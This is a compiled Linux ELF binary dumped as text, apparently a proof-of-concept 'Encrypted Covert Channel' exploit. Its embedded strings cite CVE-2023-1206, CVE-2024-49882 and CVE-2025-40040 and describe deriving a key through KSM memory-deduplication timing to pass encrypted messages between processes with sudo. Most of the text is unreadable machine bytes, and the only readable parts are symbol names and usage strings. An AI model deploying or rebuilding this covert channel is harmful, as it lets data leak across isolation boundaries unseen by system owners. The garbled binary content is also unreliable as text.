POC / covert_encrypted
ELF>�@�@8
@'&@@@��ii   00-==P-==��88800hhhDDS�td88800P�td�%�%�%llQ�tdR�td-==/lib64/ld-linux-x86-64.so.2 GNU���GNUԷY��NG<��h���w+GNU��e�m9����+0s ��E
���L�X0 �l8�@?��? Q�"�@@e @putsperror__stack_chk_fail__printf_chkfreeputcharmunmapfopenstrlenreadusleep__memcpy_chkoptargmalloc__libc_start_mainstderrgetopt__cxa_finalizefclosememsetsignalmemcpyfwritemadvisemmaplibc.so.6GLIBC_2.14GLIBC_2.3.4GLIBC_2.4GLIBC_2.34GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable�����ti	�ii
�����ui	=�=@@@�?�?�?�?�? @@@? ?(?0?8?@?H?	P?
X?`?h?
p?x?�?�?�?�?�?�?�?�?�?�?�?��H��H��/H��t��H����5�.�%�.@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f����%>.fD���%N-fD���%F-fD���%>-fD���%6-fD���%.-fD���%&-fD���%-fD���%-fD���%-fD���%-fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fDH�=�������f.�f���AVE1�AUE1�ATL�%�U��SH��H��0dH�%(H��$(1�L��H�މ��k������tn��rta��stL��kt7H�;��1�H��$(dH+%(��H��0[]A\A]A^�fDA���L�5,A�뉐A��H�=�
H�����H�=b���H�=����H�=����H�5>������ H���g����A��tiA����A���.���L��H�5��1������ H��L���������H�
�+��H�={�J�������H�=r�dL�d$ ����,� H��L���3��ta����������������*��u����H�=����H�=�����q���H�
�*��H�=�����d���H�=��b���L���Z���H�=�N����*������@��1�I��^H��H���PTE1�1�H�=�����*�f.�H�=A*H�:*H9�tH��)H��t	�����H�=*H�5
*H)�H��H��?H��H�H�tH��)H��t��fD�����=�)u+UH�=�)H��tH�=�)�I����d�����)]������w�������r)��I��H��tE1��L��1�H��A�B0I��L9�u��D��AWH��1�AVAUL�-L
ATI��H�5	USH���H�����L��H�=%
����H��t$H��H����H�=
���H������L��H�=����H��H��t!H�=�H�������H�����L��E1�A�����1�H���"�H��H�$���H�D$H��������L�|$H�4$�L��L������1�L��H���n���H����I�E1��DI��I9����
(����D��I�L����H���H)�����I���I�I����H��P����1H��A���A���1��H)�H=�vL��D��H������L��I����?H��?�Y���H��L��H�5�1��I���	���I9��@���H�4$H�|$N�,#H�-�����H�=w���H�5��1�����M��t�H��1�H�����I9�u�
���1�H��[]A\A]A^A_�f.���AWAVI��AUATA�UH��SH��H�|$���L9�I��LF�M�l$L���!���H����D� H�t$H�xL��L��H������M��t#1��H��1�H��A�0DH��L9�r溶�AH�=�
1�����Ņ�xCL��H�މ�������T���H�����L��1�H�5S���1�H��[]A\A]A^A_�H������������fD��AWAVAUATI��UH��SH��1�H��(H�|$H�=9
dH�%(H�D$1��b������H�t$���A������H����D�l$H�C�M��L9���L������H��H����L��H��D�����I9���D���d���1�M��tDH��1�H��A�0H��I9�u�L�|$L��H��L���l���C�/H�����D��1�H�5F�y���1�H�T$dH+%(uDH��([]A\A]A^A_��D�k�M���=���H���<���D������������D��������~���ff.���SH��H�5�H��1����H�=�����H�=����H�=����H�=���H�=3����H�=W����H�=����H�=����H�ڿ1�H�5��|���H��H�5J[�1��e�����H��H���[KSM] Deriving %zu-byte key via KSM timing...
/sys/kernel/mm/ksm/sleep_millisecs[TX] Sent %zu encrypted bytes
[RX] Received %u decrypted bytes

Encrypted Covert Channel DemoUses KSM timing for key agreement + encrypted data transfer  -s MESSAGE  Send encrypted message  -r          Receive and decrypt message  -k          Just derive and display key  Terminal 2: sudo %s -s 'SECRET MESSAGE'
╔════════════════════════════════════════════════════════════════╗║  Encrypted Covert Channel                                      ║║  CVE-2023-1206 + CVE-2024-49882 + CVE-2025-40040               ║╚════════════════════════════════════════════════════════════════╝

[Key] Key derivation complete.[Key] Use this key for manual encryption.w/sys/kernel/mm/ksm/run1
20
mmap[KSM] Key derivation complete[KSM] Key: [KSM] Derived %zu/%zu bits
%02x/dev/shm/.covert_channelUsage: %s [options]

Options:  -h          Show this help
Example:  Terminal 1: sudo %s -r
s:rkhFailed to derive key

[TX] Sending: "%s"
Send failed

[RX] Waiting for message...
=== Decrypted Message ============================;ht��������h��<��������$��������� zRx�h�&D$4���FJw�?9*3$"\8�t0��������+H��fF�G�B �I(�K0�A8�LP+8A0A(B BBB$�P������H �F�B�E �B(�G0�D8�DP�
8A0A(B BBBAHl��bF�B�B �B(�D0�D8�I`
8A0A(B BBBI���E��@�p�<F�E�E �H(�C0�J�\
0A(A BBBG�@�
\==���o���
Y?@�	��	���o���o����o�o:���o=0@P`p�������� 0@P`p���@GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0L��@`<g!.j\
�6��/Dr�t
:&K�0int1s
O*=�
N-6
��
���
:�=
����{�27�1N
3s6	��7	�8	��9	� �:	�(�;	�0P<	�8�=	�@@	�HtA	�P B	�X_Dg`Flh�Hsp;IstCJ�xMR��NY�0Oq�*Q��GY
��-[���\���]l�e^	D�3_
*��`s�Gb��
;	�3�+Zb���6Z*�����6��

N�N�#P
���}��4
<`�
Q
P��#c$�
]
H385Cs$�&z	@
�
X'ss'
[s�s���
0��sD**� 0��sD**#��
sD*�Zs*�s
HsE�s%�%%�#�fshs�z��s�*&���D�D�*��*��
64s�s�
�1s�s�
�Ls!D*�s8�
�^sXD*s&�
nj�
�9D�D*sss�
�
�s��Y
������s`<�W��sW�RD��	s��(����opt�	s��6key�
W��w''�7�g��w('8i
s��Hrr�W��~U	v%H~~
!W�U|H�<cW�U	�%
�U|T
QvR !U��H��W+)'U	�!H''�5W?=3U	�"H33��WSQ?U	�"H??��WgeKU	 #H���	'	W{y��U2T	7%Q~e��
�	���)t�hU	L%T1Q<H�	�	W���U	Y%H33	
W��?U	�#H?L	V
W��KU	$ePP�	�
���)tmhU	!%T1QE�s�
UvTsQ| �x\XU2T	�i�%UvT ��IU~TvQ  ���g6�x96�*�ư������H����W42��U2T	�$QsH���@WLJ�U	� H����W`^�U	� H����Wtr�U	�$H���'
W���U	!H���t
W��
U	8!H

��
W��U	h!H�W��"U	�$H""�[W��.U	�$H..��W��D�U2T	%Qs+HD��W
�!�:[�U2T	�!Q�UQ�s@b��(����-*'!key�D�_W0�P*��fd�	s��$��
���len�������!�y���?=�OM~
U	�$T0����	f�ge�yu�����UT��Q4����	������������UTsQ}��%�N?��5��+,K�%"L.*��;EC/\Z#ki$!U��TsQ}H11�W|zG�U2T	� Q~��,U}�QDU1�\Us��tUs�Q�U�Q�U �����6�r�s@���(� ���!key�8���0�D*��len�*
���_Yfd�	s�{����;��/��#���&!UsT��Q|R|��(�A?��5��+,K�("L&"������=;�OM�
U	�$T
AQ
�H�Wge�U2T	h Q|h�U���3U}�hWUvTsQ}�QoUv��Us3�Us;e8s�!key8��}08)*��f=��hD*F:lED��'K/bitQ*��(\�RD		@V�G	E	t1]Y	W	t2]h	f	<�e�rW	�w	u	��	�	��	�	H��m
W�	�	��U2T	�$Q~RvK!U
P�=�#�iu*�	�	+H�u)W�	�	�U2TvH�2:�W


�U2T	 Q|e>G�"
 
t<
8
5hU	K$T1Q2RveTTA��R
P
tl
h
mhU	N$T1Q3Rv���
N�
�
��
�
��
�
�/!UsT0Q|H��siW�
�
�U	W$H��t�W�
�
��U2T	u$H
vW�
�
%a!U:�%U	4$T}=�=UvL�bU	@ T}u�zUv�j�U0T��Q3R"X	�Y0�8�UT��Q<��U��T��LXU	R$>�-X	�-�-len&*-key:�	0-F*?@i/**�(���Asig(sUZ)s�	D)�	�)s���	Cs	HD	\%*v9D	
9D	K9s	�9*#DH	
F	��	�*�Tse	-T ��Ms�	�M�	-M<�B�+��U+T5�
�
?RCK"L
�
=== Decrypted Message ===
%�%s
�=========================
���╔════════════════════════════════════════════════════════════════╗
J�H║  Encrypted Covert Channel                                      ║
J�H║  CVE-2023-1206 + CVE-2024-49882 + CVE-2025-40040               ║
���╚════════════════════════════════════════════════════════════════╝

�� �
[RX] Waiting for message...
#�!
[Key] Key derivation complete.
-�+[Key] Use this key for manual encryption.
D��"� 
Encrypted Covert Channel Demo
?�=Uses KSM timing for key agreement + encrypted data transfer

�
Options:
(�&  -s MESSAGE  Send encrypted message
-�+  -r          Receive and decrypt message
-�+  -k          Just derive and display key
 �  -h          Show this help

�
Example:
#vl!�[KSM] Key derivation complete
�
��I~1�BIH}
:!;9I81R�BX!YWH}6	:;9I
:;9I!I$>
.?:;9'I<4:!;9I�B:!;9I�B4:!;9I�B1R�BUX!YW.?:;9'I<.?:;9!'I !4.?<n:!;!I7I!I/1R�BX!YW1&I<.?:;9n'I<.?:!;9!'I@z1R�BUX!YW H}!:!;9I�B"41�B#4:;9!I?<$4:!;9I%.?:!;9!'<&.?:;9!
'<'U(U)1*.?:!;9!'@z+1R�BUX!YW,1-:!;!-9I.%U/0$>15I2:;93:;94&5'64:;9I74:;9I84:;9I�B9!I/:H}�;.?:;9'IU@z<4:;9I=>.?:;9' ?@4:;9IA:;9IB.1@zC1UD.?<n�
��
Or�����!*29@HWen|����	�' J+38�4K
=X	K�"�JXmKc
.cXNp
Xtc
XXc
JXg��
�!o�	!X
�"r�-�+�<
�k
�
+J
jf�:�+t�	�b
e<t
e<J
e.�	�Y#'J	g>/$.?
�(< <X(J <.	?
=I<
�g
+7
yX:
+� <Za
�`
.
)�_)
a<�
aJX%Y^
�"/�t	@	K�d��;=L��
�<�X
�J���
X��
X	��"�JX����O�u��
X�/�...	v �s��f.�J�Xt���X�
�~����~
X��YI=����~
�����~
.	��"�JX��~
X��Y��
X�/X.h�J<		X��l	x�.1K��
� ��
�<tX��
���
���
���
���
���
���
���
���
X��
��
� �		@��	`�h:	/;f/00�	Y��M7.	�-
�
u
h>��~
	�t
�~<X��~
���~
���~
��	��	��~
X	�
�
��~
�
�x	
��~
��
�~XX
�%/JP2y�%��	
�~
�	��~
�	�
�~	�X�~
�	�X�~
���~
���~
��
�~�X__off_t_IO_read_ptrmalloc_chain__read_alias_shortbuf__uint8_t__path__ch_IO_buf_base__sighandler_t__builtin_memsetlong long unsigned int__src__open_too_many_argsfreemadviselong long int__builtin_fwrite__oflag_fileno_IO_read_end_IO_lock_tusleep_flags__ssize_t__builtin_puts_IO_codecvt__printf_chk_old_offset__uint32_t_IO_marker_freeres_bufsend_encryptedfprintf__open_missing_modeprog__streamprint_usagepage_IO_write_ptrmunmap__builtin_putcharshort unsigned intmaxlenstrlen_IO_save_basegetopt__builtin_memcpy_lock__read_chk_flags2__fd__open_2receive_encryptedoptargGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_IO_write_end__dest__builtin___memcpy_chkmessagekeylen_IO_FILEpattern__buf__uint64_tfopen_markersnum_pagesunsigned char_IO_buf_endshort intxor_cryptcycles_vtable_offset__fprintf_chk__stack_chk_failsignalmmaprunningargcbufferfclose__off64_t_cur_column_IO_read_base_IO_save_end__fmt__pad5__useconds_t_unused2stderrargv__nbytesderive_key_ksm_IO_backup_base__open_aliassignal_handlerperrorread_freeres_list_IO_wide_data__len__read_chk_warnmain_IO_write_baseheadercovert_channel_encrypted.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/x86_64-linux-gnu/sysstdio2.hstring_fortified.hfcntl2.hunistd.hstddef.htypes.hstruct_FILE.hstdio.hstdint-uintn.hgetopt_core.hsignal.hunistd-decl.hstdlib.hstring.hstdio2-decl.hmman.h<built-in>`8U8YVY��U���V���U�`8T8aSa��T���S���T���S���T��0�hw1��0�ow^�PE�P�0�r��~����3'�3�M?���
7%��
L%���q3��?��P
!%��UQ�S��Q���U��
�$������ ��U ��d ��� 
�� �� "�!.
%�@)U)���@T�S���T���S���T�@=Q=�\���Q���\@=R=�V���R���V~P�_��_��_�	]	�^��]��^��]��^�P�S��Sy0�y
�$��4��T����P_�	~������
P
S�_�%V�%\�%	~������%S�0�%R	~�����S��1
� �@'U'���@'T'�^���T���^@'Q'�V���Q�nP�\��}|���$
#������������������,(���\"P"�S��S�P8VGNPNOV�\�T���Us��(V�(^�(\�(s��0�(R�
A��
�$�
h ��,U,�S���U���S@S�"T"4Q4�\���T���\@\ P )V;XPX�V��V@Vua|3$�a�V��|3$����T3$���|3$�@|3$��"P"I_��P@P���0�~�.~�.�^��P��~���~��_�`�#�_���`�|~�PP_P3
�3~��3_� 
�$��0�s�U��U s"��
�$��1
 �
K$�PVT
N$�TPV�
\�
0��
S��8!�
u$�
�[!�Q+Y�0�&Xy�&��@�#(,1���
2����
225<?CEe� 
�	W"'��D

��
G���?��@`��	� �.@6@J�U�Wj@�H@�=���=J��,(��=��%?/C` = @|f�@��\���+����	@b�*;@H[ @n� �@�� ��P@A�&� @��`<.-?Rex@���� �@��"���f��@@Scrt1.o__abi_tagcovert_channel_encrypted.crunningderive_key_ksm.coldcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE_free@GLIBC_2.2.5putchar@GLIBC_2.2.5__libc_start_main@GLIBC_2.34_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_finistrlen@GLIBC_2.2.5xor_crypt__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5memset@GLIBC_2.2.5receive_encryptedsignal_handlerread@GLIBC_2.2.5__data_startsignal@GLIBC_2.2.5optarg@GLIBC_2.2.5__memcpy_chk@GLIBC_2.3.4__gmon_start____dso_handlememcpy@GLIBC_2.14_IO_stdin_usedmalloc@GLIBC_2.2.5_end__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4madvise@GLIBC_2.2.5fopen@GLIBC_2.2.5perror@GLIBC_2.2.5getopt@GLIBC_2.2.5fwrite@GLIBC_2.2.5__TMC_END__print_usage_ITM_registerTMCloneTablesend_encrypted__cxa_finalize@GLIBC_2.2.5_initderive_key_ksmusleep@GLIBC_2.2.5stderr@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��0a��i��Yq���o::@~���o��`�����B�	�	@��  ���������@@	�\\
�  ���%�%l�&&�=-�=-�=-��?/@0 @00 00+?0P)�0k!5�QC�U�
O0�`�Z0�e�j2gzQr}�sx%	HzW~�